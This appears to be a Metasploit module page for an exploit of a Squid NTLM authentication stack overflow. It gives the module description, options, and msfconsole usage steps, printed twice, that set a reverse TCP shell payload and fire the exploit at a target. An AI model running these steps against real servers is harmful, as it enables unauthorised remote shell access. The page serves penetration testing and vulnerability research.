Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Squid NTLM Authenticate Overflow
This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory.
Rank
- Great
Authors
- skape < mmiller [at] hick.org >
References
Exploit Targets
- 0 - Linux Bruteforce (default)
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/proxy/squid_ntlm_authenticate
msf exploit(squid_ntlm_authenticate) > show payloads
msf exploit(squid_ntlm_authenticate) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(squid_ntlm_authenticate) > set LHOST [MY IP ADDRESS]
msf exploit(squid_ntlm_authenticate) > set RHOST [TARGET IP]
msf exploit(squid_ntlm_authenticate) > set RPORT [TARGET PORT]
msf exploit(squid_ntlm_authenticate) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/proxy/squid_ntlm_authenticate
msf exploit(squid_ntlm_authenticate) > show payloads
msf exploit(squid_ntlm_authenticate) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(squid_ntlm_authenticate) > set LHOST [MY IP ADDRESS]
msf exploit(squid_ntlm_authenticate) > set RHOST [TARGET IP]
msf exploit(squid_ntlm_authenticate) > set RPORT [TARGET PORT]
msf exploit(squid_ntlm_authenticate) > exploit
Module Options
| RHOST | The target address |
| RPORT | The target port |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |